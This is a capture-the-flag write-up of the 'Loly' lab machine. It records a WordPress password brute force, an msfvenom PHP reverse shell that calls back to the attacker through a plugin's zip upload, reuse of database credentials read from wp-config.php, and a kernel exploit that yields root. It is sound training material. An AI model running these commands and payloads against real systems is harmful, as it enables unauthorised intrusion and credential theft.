Proving Grounds: Loly Walkthrough
Machine Stats
Name
Loly
OS
Linux
Rating
Intermediate
Enumeration
I started by running my standard nmap scan.
nmap -A -T4 -p- 192.168.167.121
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 18:04 EDT
Nmap scan report for 192.168.167.121
Host is up (0.035s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.55 secondsHere we can see an open web server. I decided to scan the site with feroxbuster to find directories.
โโ$ feroxbuster --url http://192.168.167.121
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher ๐ค ver: 2.7.0
โโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโ
๐ฏ Target Url โ http://192.168.167.121
๐ Threads โ 50
๐ Wordlist โ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
๐ Status Codes โ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
๐ฅ Timeout (secs) โ 7
๐ฆก User-Agent โ feroxbuster/2.7.0
๐ Config File โ /etc/feroxbuster/ferox-config.toml
๐ HTTP methods โ [GET]
๐ Recursion Depth โ 4
๐ New Version Available โ https://github.com/epi052/feroxbuster/releases/latest
โโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโ
๐ Press [ENTER] to use the Scan Management Menuโข
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
200 GET 25l 69w 612c http://192.168.167.121/
301 GET 7l 13w 194c http://192.168.167.121/wordpress => http://192.168.167.121/wordpress/
301 GET 7l 13w 194c http://192.168.167.121/wordpress/wp-content => http://192.168.167.121/wordpress/wp-content/
301 GET 7l 13w 194c http://192.168.167.121/wordpress/wp-admin => http://192.168.167.121/wordpress/wp-admin/
301 GET 7l 13w 194c http://192.168.167.121/wordpress/wp-includes => http://192.168.167.121/wordpress/wp-includes/
...There’s a lot more results that I could include here, but needless to say, this is a WordPress site. I visited the site in a browser to double-check.
User Account
Because we have a WordPress site, I decided to use WPScan to see if there are any plugins/themes/users/vulnerabilities we can enumerate.
โโ$ wpscan --url http://192.168.167.121/wordpress -e --api-token XXXXXXXXXXXXXX
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ยฎ
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.167.121/wordpress/ [192.168.167.121]
[+] Started: Tue May 31 18:09:41 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.167.121/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.167.121/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.167.121/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.167.121/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.167.121/wordpress/, Match: 'WordPress 5.5'
|
| [!] 20 vulnerabilities identified:
|
| [!] Title: WordPress < 5.5.2 - Hardening Deserialization Requests
| Fixed in: 5.5.2
| References:
| - https://wpscan.com/vulnerability/f2bd06cf-f4e9-4077-90b0-fba80c3d0969
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28032
| - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3
| - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
| - https://github.com/WordPress/Requests/security/advisories/GHSA-52qp-jpq7-6c54
|
| [!] Title: WordPress < 5.5.2 - Disable Spam Embeds from Disabled Sites on a Multisite Network
| Fixed in: 5.5.2
| References:
| - https://wpscan.com/vulnerability/a1941f4f-6adb-41e9-b47f-6eddd6f6a04a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28033
| - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
| - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
|
| [!] Title: WordPress < 5.5.2 - Cross-Site Scripting (XSS) via Global Variables
| Fixed in: 5.5.2
| References:
| - https://wpscan.com/vulnerability/336deb2e-5286-422d-9aa2-6898877d55a9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28034
| - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
| - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
|
| [!] Title: WordPress < 5.5.2 - XML-RPC Privilege Escalation
| Fixed in: 5.5.2
| References:
| - https://wpscan.com/vulnerability/76a05ec0-08f3-459f-8379-3b4865a0813f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28035
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28036
| - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/c9e6b98968025b1629015998d12c3102165a7d32
| - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
|
| [!] Title: WordPress < 5.5.2 - Unauthenticated DoS Attack to RCE
| Fixed in: 5.5.2
| References:
| - https://wpscan.com/vulnerability/016774df-5031-4315-a893-a47d99273883
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28037
| - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/2ca15d1e5ce70493c5c0c096ca0c76503d6da07c
| - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
| - https://threatpost.com/wordpress-patches-rce-bug/160812/
|
| [!] Title: WordPress < 5.5.2 - Stored XSS in Post Slugs
| Fixed in: 5.5.2
| References:
| - https://wpscan.com/vulnerability/990cf4ff-0084-4a5c-8fdb-db374ffcb5df
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28038
| - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
| - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
|
| [!] Title: WordPress < 5.5.2 - Protected Meta That Could Lead to Arbitrary File Deletion
| Fixed in: 5.5.2
| References:
| - https://wpscan.com/vulnerability/30662254-5a8d-40d0-8a31-eb58b51b3c33
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28039
| - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/d5ddd6d4be1bc9fd16b7796842e6fb26315705ad
| - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
|
| [!] Title: WordPress < 5.5.2 - Cross-Site Request Forgery (CSRF) to Change Theme Background
| Fixed in: 5.5.2
| References:
| - https://wpscan.com/vulnerability/ebd354db-ab63-4644-891c-4a200e9eef7e
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28040
| - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/cbcc595974d5aaa025ca55625bf68ef286bd8b41
| - https://blog.wpscan.com/wordpress-5-5-2-security-release/
| - https://hackerone.com/reports/881855
|
| [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
| Fixed in: 5.5.4
| References:
| - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450
| - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
| - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq
| - https://core.trac.wordpress.org/changeset/50717/
| - https://www.youtube.com/watch?v=J2GXmxAdNWs
|
| [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
| Fixed in: 5.5.5
| References:
| - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
| - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
| - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
| - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
| - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
| - https://www.youtube.com/watch?v=HaW15aMzBUM
|
| [!] Title: WordPress 5.4 to 5.8 - Lodash Library Update
| Fixed in: 5.5.6
| References:
| - https://wpscan.com/vulnerability/5d6789db-e320-494b-81bb-e678674f4199
| - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
| - https://github.com/lodash/lodash/wiki/Changelog
| - https://github.com/WordPress/wordpress-develop/commit/fb7ecd92acef6c813c1fde6d9d24a21e02340689
|
| [!] Title: WordPress 5.4 to 5.8 - Authenticated XSS in Block Editor
| Fixed in: 5.5.6
| References:
| - https://wpscan.com/vulnerability/5b754676-20f5-4478-8fd3-6bc383145811
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39201
| - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-wh69-25hr-h94v
|
| [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
| Fixed in: 5.5.6
| References:
| - https://wpscan.com/vulnerability/38dd7e87-9a22-48e2-bab1-dc79448ecdfb
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
| - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-m9hc-7v5q-x8q5
|
| [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
| Fixed in: 5.5.7
| References:
| - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
| - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/ticket/54207
|
| [!] Title: WordPress < 5.8 - Plugin Confusion
| Fixed in: 5.8
| References:
| - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223
| - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/
|
| [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
| Fixed in: 5.5.8
| References:
| - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
| - https://hackerone.com/reports/1378209
|
| [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
| Fixed in: 5.5.8
| References:
| - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w
| - https://hackerone.com/reports/425342
| - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
|
| [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
| Fixed in: 5.5.8
| References:
| - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86
|
| [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
| Fixed in: 5.5.8
| References:
| - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h
| - https://hackerone.com/reports/541469
|
| [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
| Fixed in: 5.5.9
| References:
| - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
| - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <================================================================================================> (472 / 472) 100.00% Time: 00:00:03
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:20 <==============================================================================================> (2568 / 2568) 100.00% Time: 00:00:20
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:06 <=================================================================================================> (137 / 137) 100.00% Time: 00:00:06
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <=======================================================================================================> (71 / 71) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:01 <============================================================================================> (100 / 100) 100.00% Time: 00:00:01
[i] Medias(s) Identified:
[+] http://192.168.167.121/wordpress/?attachment_id=12
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] loly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 1
| Requests Remaining: 74
[+] Finished: Tue May 31 18:10:18 2022
[+] Requests Done: 3415
[+] Cached Requests: 4
[+] Data Sent: 1014.327 KB
[+] Data Received: 19.036 MB
[+] Memory used: 217.598 MB
[+] Elapsed time: 00:00:37Because xmlrpc is available, in addition to searching through the vulnerabilities discovered here, I decided to try bruteforcing the user loly that we just found using rockyou.txt as the wordlist.
โโ$ wpscan --url http://192.168.167.121/wordpress -U loly -P /usr/share/wordlists/rockyou.txt _______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ยฎ
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.167.121/wordpress/ [192.168.167.121]
[+] Started: Tue May 31 18:12:41 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.167.121/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.167.121/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.167.121/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.167.121/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.167.121/wordpress/, Match: 'WordPress 5.5'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=================================================================================================> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / corazon Time: 00:00:03 < > (175 / 14344567) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: loly, Password: fernando
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue May 31 18:12:50 2022
[+] Requests Done: 315
[+] Cached Requests: 30
[+] Data Sent: 133.251 KB
[+] Data Received: 123.725 KB
[+] Memory used: 208.68 MB
[+] Elapsed time: 00:00:08We now have a valid set of user credentials to login to WordPress with. Upon visiting wp-admin, it looks like some redirects are happening, which requires adding a hosts file entry for the domain name loly.lc
Once inside the WordPress site, I noticed that we do not have the ability to edit theme or plugin files, or upload new plugins. I decide to turn my attention to the AdRotate plugin, because it is the only one activated. The Manage Media menu item catches my interest because it looks like we can use it to upload files and access them, which would allow me to potentially upload a PHP reverse shell.
The first question I had was: what can we upload? Going off of the screenshot above, we can upload jpg, jpeg, gif, png, svg, html, js, and zip files. Zip files will be extracted automatically. The second question is: where are the files uploaded to?
Here we can see that the folder name is banners, and our uploaded files should be available at /wp-content/banners/filename.fileextension. I decided to use msfvenom to generate a PHP reverse shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=1337 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1115 bytesNext, I’m going to load Metasploit and use the exploit/multi/handler to catch the reverse shell when it executes.
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 1337
lport => 1337
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.49.167:1337Next, I am going to zip up the PHP reverse shell file I just created, so I can upload it using the WordPress plugin to the site.
zip shell.zip shell.phpI visited the location http://loly.lc/wordpress/wp-content/banners/shell.php in a browser. I got a loading cursor and eventually a 504 gateway timeout, which is a positive indicator to me.
Going back to the exploit/multi/handler in Metasploit…
[*] Started reverse TCP handler on 192.168.49.167:1337
[*] Sending stage (39860 bytes) to 192.168.167.121
[*] Meterpreter session 1 opened (192.168.49.167:1337 -> 192.168.167.121:40010) at 2022-05-31 18:51:07 -0400
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64
Meterpreter : php/linuxLooks like we have success, and we are in the system as the webserver user.
I’m going to use meterpreter’s built in download and upload capabilities to move linpeas over to the victim machine for enumeration and to download local.txt
meterpreter > upload /var/www/html/linpeas.sh /tmp/linpeas.sh
[*] uploading : /var/www/html/linpeas.sh -> /tmp/linpeas.sh
[*] Uploaded -1.00 B of 757.53 KiB (0.0%): /var/www/html/linpeas.sh -> /tmp/linpeas.sh
[*] uploaded : /var/www/html/linpeas.sh -> /tmp/linpeas.sh
meterpreter > download /var/www/local.txt
[*] Downloading: /var/www/local.txt -> /home/me/local.txt
[*] Downloaded 33.00 B of 33.00 B (100.0%): /var/www/local.txt -> /home/me/local.txt
[*] download : /var/www/local.txt -> /home/me/local.txt
cat local.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXPrivilege Escalation & Root Flag
Because the site we exploited is powered by WordPress, and we are the webserver user, we should be able to view the contents of wp-config.php, which will give us a database username and password. Usually in things like Hack the Box this credential is re-used for a user account.
-rw-r--r-- 1 loly www-data 3014 Aug 20 2020 /var/www/html/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );
define( 'DB_HOST', 'localhost' );Because we know there is a system user named loly (as seen in the output above and verified by viewing the output of ‘cat /etc/passwd’) I decided to try switching to that user give the password above.
meterpreter > shell
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/home/loly$ su loly
Password: lolyisabeautifulgirl
loly@ubuntu:/var/www$Now, I ran the linpeas script we uploaded previously using meterpreter. The major discovery from this script running were the Linux kernel version (highlighted in red and yellow, usually indicating a critical finding) and the wp-config.php credentials previously noted.
OS: Linux version 4.4.0-31-generic (buildd@lgw01-16) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2.1) ) #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016A quick Google search dug up the following exploit: https://www.exploit-db.com/exploits/45010
I confirmed the victim machine was running GCC to compile the exploit C code and then backgrounded my session to drop back to meterpreter.
meterpreter > upload /home/me/Downloads/45010.c /tmp/45010.c
[*] uploading : /home/me/Downloads/45010.c -> /tmp/45010.c
[*] Uploaded -1.00 B of 13.41 KiB (-0.01%): /home/me/Downloads/45010.c -> /tmp/45010.c
[*] uploaded : /home/me/Downloads/45010.c -> /tmp/45010.c
I then went back to my system shell via the session I just backgrounded and began running the exploit as described in the Exploit DB page.
loly@ubuntu:/tmp$ gcc 45010.c -o 45010
loly@ubuntu:./45010
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88007ad49f00
[*] Leaking sock struct from ffff880035c97a40
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88007cb59240
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88007cb59240
[*] credentials patched, launching shell...
# whoami
root
cat /root/proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXI submitted this flag and it was accepted.